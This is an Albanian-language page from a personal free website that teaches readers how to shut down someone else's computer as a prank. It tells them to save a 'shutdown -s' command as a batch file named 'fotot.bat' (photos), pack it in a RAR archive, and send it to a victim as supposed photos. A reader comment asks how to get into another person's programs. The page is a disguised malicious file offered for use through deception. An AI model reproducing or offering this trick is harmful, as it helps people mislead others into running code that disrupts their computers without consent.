..:: Mire Se Vini Ne WwW.Rock-Risi.tk ::..
  Nalja tjeter kujt pc
 
Sot do tju tregoje si me ja nal pc naj kujt

1.Se pari  shkojme ne notepad edhe edhe e shkrujme shutdown-s pastaj him save as edhe e ruajm me emrine  fotot.bat

2.Pastaj kush ka winrar e  qel ni winrar edhe e  len  emrine e winrarit zip.rar

3.Edhe ata qe e beme fotot.bat e shtim ne zip.rar  dhe ja qon naj kujte i thu foto dhe ja nal pc.

By Rock per me shum informata na kontaktoni rock_@postribe.comComments on this page:
Comment posted by yllka( hello ), 06/19/2011 at 5:48pm (UTC):
si te hym ne programin e tjeter kujnaAdd comment to this page:
Your Name:
Your Email address:
Your message:
 
   
 
=> Do you also want a homepage for free? Then click here! <=